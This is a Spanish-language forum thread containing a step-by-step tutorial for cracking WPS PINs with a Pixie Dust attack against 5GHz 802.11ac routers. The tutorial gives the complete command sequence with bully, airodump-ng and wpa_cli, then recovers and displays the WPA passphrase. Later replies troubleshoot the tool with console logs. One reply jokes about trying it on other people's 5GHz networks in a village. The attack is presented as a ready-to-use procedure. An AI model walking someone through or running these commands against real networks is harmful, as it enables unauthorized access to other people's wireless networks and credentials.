Manual crack WPS con ataque pixiedust banda 5Ghz (estándar a y ac) (Pagina 1) / Preguntas generales y busqueda de nuevas brechas / Foro Wifi-libre.com

El libre pensamiento para un internet libre

No estas registrado.     

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#1 17-06-2016 15:46:11

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,196

Manual crack WPS con ataque pixiedust banda 5Ghz (estándar a y ac)

Manual crack WPS en banda 5Ghz (estándar a y ac) con un solo PIN (método pixiedust)

crack_wps_5ghz_4.jpg

  Se lee por muchos lados que no hay forma de utilizar las técnicas modernas de crack WPA (explotando la "brecha" llamada WPS y su modo PIN) contra la ultima generación  de puntos de acceso.
  Me refiero a los routers compatibles con el estándar ac cuya tasa de transmisión puede alcanzar hasta 2167Mbps ("ac3100" y "ac3150")
  Incluso no son pocos los temas en el foro aircrack-ng o Kali Linux dónde se afirma que no hay forma de inyectar trafico en la banda 5Ghz.
  No es cierto y lo voy a demostrar enseguida realizando en vivo un ataque pixie dust contra un punta de acceso "ac1200": El Alfa Network AC1200R.
  Generaré el PIN por defecto con tan solo un solo intento y obtendré la llave WPA del punto de acceso
Si no te ha quedado claro las lineas anteriores un poco de lectura :
    Sobre el ataque pixie dust :     "Pixie Dust" ataque de fuerza bruta offline para generar el PIN valido
    Sobre el estándar ac : Bien entender el estándar "ac" para no caer en la trampa
 

Lo que necesitamos

  1. - Un adaptador wifi con chipset Ralink RT3750 o RT3572
    Desgraciadamente son a mi conocimiento los únicos chipset con compatibilidad mode monitor y inyección en banda 5Ghz. Yo usaré un RT3572; es el chipset que lleva la Alfa AWUS052NH 

  2. - Un routeur ac con chipset realtek o ralink
    Estos modelos de chipset estan soportados por pixiewps lo que significa que obtendremos el PIN en un instante

  3. - Bully modificado por aanarchyy
    El ataque pixedust se ha de hacer con bully porque reaver funciona muy mal con los chipsets USB ralink. Para descargar y instalar la mod de aanrchyy ver Bully WPS: La alternativa a Reaver renace con soporte Pixiewps

¡Acción!

  El crack se hace en dos etapas.

  1. Hacer el ataque pixie dust con bully para obtener el PIN

  2. Mandar el PIN obtenido con wpa_cli para obtener la llave WPA

  Debemos hacerlo así porque el chispet rt30572 no anda muy bien con el WPS en modo monitor.
  Con reaver ni vale la pena probar
  Con bully basta para obtener el M3 y poder hacer un ataque pixie dust pero no se logra llegar hasta el M8 para obtener la llave WPA.
  Por lo tanto se ha de usar wpa_cli (comando interactivo para wpa_supplicant) para mandar el PIN y obtener la llave

Etapa uno : ataque pixie dust

Enchufamos el Wifi USB con chipset RT3570 o RT3572 en el puerto USB (será muy probablemente la interfaz wlan1 ) y lo ponemos en mode monitor.
Para no tener conflictos con network manager a la hora de mandar el PIN con wpa_cli debemos "matar" a los procesos potencialmente conflictivos.
Por lo tanto hacemos

sudo airmon-ng check kill

Seguido de

sudo airmon-ng start wlan1

crack_wps_5ghz_2.jpg

Obtenemos una interfaz wlan1mon en modo monitor que usamos para escanear la banda 5Ghz (con airodump-ng)

sudo airodump-ng --wps -b a --manufacturer wlan1mon

Es importante usar las opciones --wps (para ver si el wps esta activado) y -b a (para escanear solo la banda "a" ) 
Cuando vemos nuestro punto de acceso aramos el escaneo con [CTRL+C] y copiamos su BSSID

crack_wps_5ghz_3.jpg

Este es el alfa AC1200R con su eSSID por defecto para la red "ac": 11n AP 5G

Podemos lanzar el ataque pixiedust con Bully modificado por AAnarchyy

sudo bully -5 -b 00:C0:CA:85:32:E2 -d -v 4 wlan1mon
  • -5 : para usar la banda 5Ghz, la que usa el estándar ac

  • -b <mac_router> : argumento mandatario, ponemos la dirección mac del objetivo

  • -d : opción para efectuar un ataque pixie dust automaticamente

  • -v 4 : nivel de salida máximo (verbose); para ver todos los detales en consola

  • wlan1mon : segundo argumento mandatario, la interfaz que debe ser en modo monitor

Enseguida se obtienen las cadenas para hacer un pixie dust cool

crack_wps_5ghz_5.jpg

El PIN por defecto se obtiene en una fracción de segundos...
(Obviamente se necesita tener pixiewps del amigo wiire instalado, la herramienta oficial para hacer ataques pixiedust.)

crack_wps_5ghz_6.jpg

Bully va a intentar luego obtener la llave WPA mandando el PIN.
Pero no logrará, así que no vale la pena esperar y parramos el proceso con [CTRL+C]
Pasamos a la segunda fase

Etapa dos: Obtener la contraseña WPA con el PIN y wpa_cli

  Para ello solo tenemos que inspirarnos con el buenísimo tutorial de Coeman76 : [ Tutorial ] Conexión WPS desde Linux (Debian,Slax,etc..)
 
  Lo primero es desactivar el mode monitor que no necesitamos.

sudo airmon-ng stop wlan1mon

  Y volvemos a tener a nuestra interfaz tipo wlanX en modo managed

crack_wps_5ghz_7.jpg

Por si a caso se despierta "network manager" lo volvemos "a matar"

sudo airmon-ng check kill

crack_wps_5ghz_9.jpg

  Ahora creamos un archivo de texto para recoger la llave WPA.
Lanzamos nuestro editor de texto favorito (gedit en mi caso) con derechos de administrador

sudo gedit

Copiamos y pegamos estas lineas

ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=root
update_config=1

Y guardamos el fichero en el directorio /etc llamándolo wpa_supplicant.conf

crack_wps_5ghz_8.jpg

  Ahora lanzamos el demonio de wpa_suplicant de tal forma que vaya rellenando nuestro fichero de configuración en vivo,  así:

sudo wpa_supplicant -i wlan1 -c /etc/wpa_supplicant.conf -B

crack_wps_5ghz_10.jpg

  Lanzamos el comando interactivo de wpa_supplicant (se llama wpa_cli) indicando nuestra interfaz

sudo wpa_cli -i wlan1

crack_wps_5ghz_11.jpg

  Volvemos atrás en nuestra consola para copiar el bSSID y el PIN y pegar los en la siguiente linea de ordenes

wps_reg 00:C0:CA:85:32:E2 40899336

crack_wps_5ghz_12.jpg

  Le damos a [ENTER] y observamos lo que sucede en consola :

crack_wps_5ghz_13.jpg

Todo va muy rápido, un segundo o dos.
  Podéis ver en la parte colorida de verde el mensaje de éxito con el bendito :

<3>WPA: Key negotiation completed with 00:c0:ca:85:32:e2 [PTK=CCMP GTK=CCMP]
<3>CTRL-EVENT-CONNECTED - Connection to 00:c0:ca:85:32:e2 completed [id=1 id_str=]

  significa que hemos mandado el PIN y que el router no has devuelto la llave WPA
 
  El prompt de wpa_cli vuelve a aparecer y si entramos el comando

status

  Vemos los detalles del Punto de Acceso con el cuál hemos llevado a cabo nuestra transacción WPS :

crack_wps_5ghz_14.jpg

Paso 3 : Conectarse con la llave WPA

Paramos wpa_cli tecleando

quit

Y volvemos a activar Network Manager con

sudo restart network-manager

crack_wps_5ghz_15.jpg

  Ahora recogemos la llave WPA que se ha guardado en el fichero /etc/wpa_supplicant.conf que hemos creado anteriormente

cat /etc/wpa_suplicant.conf

crack_wps_5ghz_16.jpg

  ¡Ojo!
La contraseña esta entre comillas (") y no forman parte de la contraseña wink
O sea, obtengo

psk="wifilibre43ver"

Y debo copiar unicamente wifilibre43ver.
Esta es la contraseña...

Comprobando la validez del proceso ....

crack_wps_5ghz_17.jpg

crack_wps_5ghz_18.jpg

crack_wps_5ghz_19.jpg

    ¡Estoy conectado a mi Punto de Acceso ac1200 con su tasa de 867Mbps! cool
  Así se lleva un crack WPS contundente contra un router "ac"... Mission is possible!   smile

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#2 16-08-2016 22:43:09

cardi1977
Usuario

Desde: sevilla
Registrado: 17-10-2015
Mensajes: 71

Re: Manual crack WPS con ataque pixiedust banda 5Ghz (estándar a y ac)

para quitarse el sombrero,yo los fines de semanas suelo ir ha mi pueblo y ahi unas pocas 5g voy ha intentarlo.jajajajajajaj

Desconectado

#3 16-08-2016 22:56:39

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,196

Re: Manual crack WPS con ataque pixiedust banda 5Ghz (estándar a y ac)

Me doy cuenta que en el tema hablo solo de los chispet USB Ralink pero se debería poder hacer (y solo con reaver) con algunos chipsets internos Intel y Broadcom que tienen soporte ac y soporte mode monitor & inyección.
¡Saludos! smile

Desconectado

#4 04-09-2017 19:26:46

carlitomorao
Usuario

Registrado: 28-11-2016
Mensajes: 5

Re: Manual crack WPS con ataque pixiedust banda 5Ghz (estándar a y ac)

Hola a todos,bueno despues de llevar un tiempo por aqui y leer infinidad de post,me detuve a probar este nuevo tipo de ataque sobre mi propia red,la verdad que despues de revisar una y otra vez...no encuentro donde esta el problema,expongo mi caso,realizo todos los pasos descritos por kcdtv pero llego al punto en el que lanzo bully y se me queda trabado a la escucha en la banda de 5ghz hasta llegar al canal 58 en el cual se detiene y no avanzo nada mas,aclaro que actualmente uso un adaptador Alfa AWUS052NG el cual trae en su interior el famoso Ralink RT3572,adjunto captura de consola por si alguien sabe solventar el fallo o darme un poco de luz en el asunto,gracias.
Imagen : texte

Desconectado

#5 05-09-2017 11:13:12

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,196

Re: Manual crack WPS con ataque pixiedust banda 5Ghz (estándar a y ac)

Buenos días
¿Has deshabilitado Network Manager?
Bully no consigue fijar la interfaz en el canal correcto y puede ser por culpa de procesos conflictivos.
Podría ser un asunto de versiones-drivers-kernel. 
¿Tu sistema está bien al día?

Desconectado

#6 05-09-2017 11:50:47

carlitomorao
Usuario

Registrado: 28-11-2016
Mensajes: 5

Re: Manual crack WPS con ataque pixiedust banda 5Ghz (estándar a y ac)

kcdtv escribió:

Buenos días
¿Has deshabilitado Network Manager?
Bully no consigue fijar la interfaz en el canal correcto y puede ser por culpa de procesos conflictivos.
Podría ser un asunto de versiones-drivers-kernel. 
¿Tu sistema está bien al día?

Hola de nuevo,previamente deshabilito Network Manager mediante (airmon-ng check kill),en que distribucion se realizaron las pruebas del tutorial?decir que mis pruebas realizadas fueron en kali-linux.

[email protected]:~# cat /etc/*-release
DISTRIB_ID=Kali
DISTRIB_RELEASE=kali-rolling
DISTRIB_CODENAME=kali-rolling
DISTRIB_DESCRIPTION="Kali GNU/Linux Rolling"
PRETTY_NAME="Kali GNU/Linux Rolling"
NAME="Kali GNU/Linux"
ID=kali
VERSION="2017.1"
VERSION_ID="2017.1"
ID_LIKE=debian
ANSI_COLOR="1;31"
HOME_URL="http://www.kali.org/"
SUPPORT_URL="http://forums.kali.org/"
BUG_REPORT_URL="http://bugs.kali.org/"
[email protected]:~#

Ultima edición por carlitomorao (05-09-2017 12:15:11)

Desconectado

#7 05-09-2017 12:35:59

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,196

Re: Manual crack WPS con ataque pixiedust banda 5Ghz (estándar a y ac)

Pon aquí el final de dmesg para ahorrar preguntas. smile

sudo dmesg

Usa la opción insertar código y no pongas todo, solo el final, para ver el falló.
Para ver la versión es más completo con

uname -a

Desconectado

#8 05-09-2017 12:55:45

carlitomorao
Usuario

Registrado: 28-11-2016
Mensajes: 5

Re: Manual crack WPS con ataque pixiedust banda 5Ghz (estándar a y ac)

kcdtv escribió:

Pon aquí el final de dmesg para ahorrar preguntas. smile

sudo dmesg

Usa la opción insertar código y no pongas todo, solo el final, para ver el falló.
Para ver la versión es más completo con

uname -a

Ahi va a ver si te sirve.
2mpwnt1.png

Desconectado

#9 05-09-2017 16:02:54

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,196

Re: Manual crack WPS con ataque pixiedust banda 5Ghz (estándar a y ac)

OK.
No se ve ningún problema "mecánico" y se ve que el problema viene de bully
Bueno, accabo de probar y hay un problema con el bully tal y como está en Kali ahora:

[!] Bully v1.1 - WPS vulnerability assessment utility
[P] Modified for pixiewps by AAnarchYY([email protected])
[X] Unknown frequency '-1113135872' reported by interface 'wlan1mon'
[!] Using '4c:bb:58: for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '18:44:e6' on channel 'unknown'
[+] Switching interface 'wlan1mon' to channel '36'
[!] ioctl(SIOCSIWFREQ) on 'wlan1mon' failed with '-1'
[X] Unable to set channel on 'wlan1mon', exiting

El valor aquí "Unknown frequency '-1113135872' " es problemático big_smile
He usado también mi rt3572
No sé porque hay esta cadena "111313". si no estaría se tendría la frecuencia correcta: 5,872 Ghz
Al final reventa al llegar al canal 54...

[+] Switching interface 'wlan0mon' to channel '36'
[+] Switching interface 'wlan0mon' to channel '40'
[+] Switching interface 'wlan0mon' to channel '44'
[+] Switching interface 'wlan0mon' to channel '48'
[+] Switching interface 'wlan0mon' to channel '52'
[+] Switching interface 'wlan0mon' to channel '56'
[+] Switching interface 'wlan0mon' to channel '58'
[!] ioctl(SIOCSIWFREQ) on 'wlan0mon' failed with '-1'
[X] Unable to set channel on 'wlan0mon', exiting

No pasa del 58...
Prueba con tu router configurado en el canal 40, será más simple

Desconectado

#10 05-09-2017 19:15:42

carlitomorao
Usuario

Registrado: 28-11-2016
Mensajes: 5

Re: Manual crack WPS con ataque pixiedust banda 5Ghz (estándar a y ac)

Hola de nuevo,segui tu consejo y probe a bajar de frecuencia del canal 100 que estaba mi red al canal 40,ahora los resultados son distintos,ni siquiera sale el primer canal en 5ghz a la escucha,asi lleva ya alrededor de 20 minutos y no se mueve de ahi.

[email protected]:~# sudo bully -5 -b xx:xx:xx:xx:xx:xx -d -v 4 wlan0mon
[!] Bully v1.1 - WPS vulnerability assessment utility
[P] Modified for pixiewps by AAnarchYY([email protected])
[X] Unknown frequency '-1230650368' reported by interface 'wlan0mon'
[!] Using '00:c0:ca:95:7a:1f' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from 'xx:xx:xx:xx:xx:xx' on channel 'unknown'

Desconectado

#11 06-09-2017 12:59:51

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 3,196

Re: Manual crack WPS con ataque pixiedust banda 5Ghz (estándar a y ac)

Bueno... He probado un poco más y te propongo esta solución:

  1. Instalas la ultima revisión de bully:

    git clone https://github.com/aanarchyy/bully
    cd bully/src/
    make
    sudo make install
  2. Configuras tu router en le canal 36 (supongo que 40 está bien)

  3. Antes de lanzar el ataque con bully fijas bien el canal y el objetivo con un scan con airodump-ng en una consola

    sudo airodump-ng --bssid <mac_objetivo> --channel <numero_canal>
  4. En otra consola lanzas bully

Así va muy rápido para hacer un pixiedust en frecuencias 5Ghz:

bully_45.jpg

Desconectado

#12 06-09-2017 14:16:48

carlitomorao
Usuario

Registrado: 28-11-2016
Mensajes: 5

Re: Manual crack WPS con ataque pixiedust banda 5Ghz (estándar a y ac)

Bien ahora si,realizadas las pruebas en el canal 36 parece que todo funciona correctamente,al aumentar de canal al 40 de nuevo continua el error,no ahi manera de llegar con el ataque mas alla de dicho canal por el momento a mi entender,creo que se debe a algun fallo en la compilacion del codigo de bully,seguiremos esperando novedades,gracias por tus aclaraciones y comprension,un saludo.

Ultima edición por carlitomorao (06-09-2017 14:20:52)

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

Pie de página

Información del usuario

Ultimo usuario registrado: AndresFree
Usuarios registrados conectados: 1
Invitados conectados: 16

Conectados: claudioruiz

Estadisticas de los foros

Número total de usuarios registrados: 670
Número total de temas: 863
Número total de mensajes: 7,187

Máx. usuarios conectados: 61 el 28-03-2017 00:04:22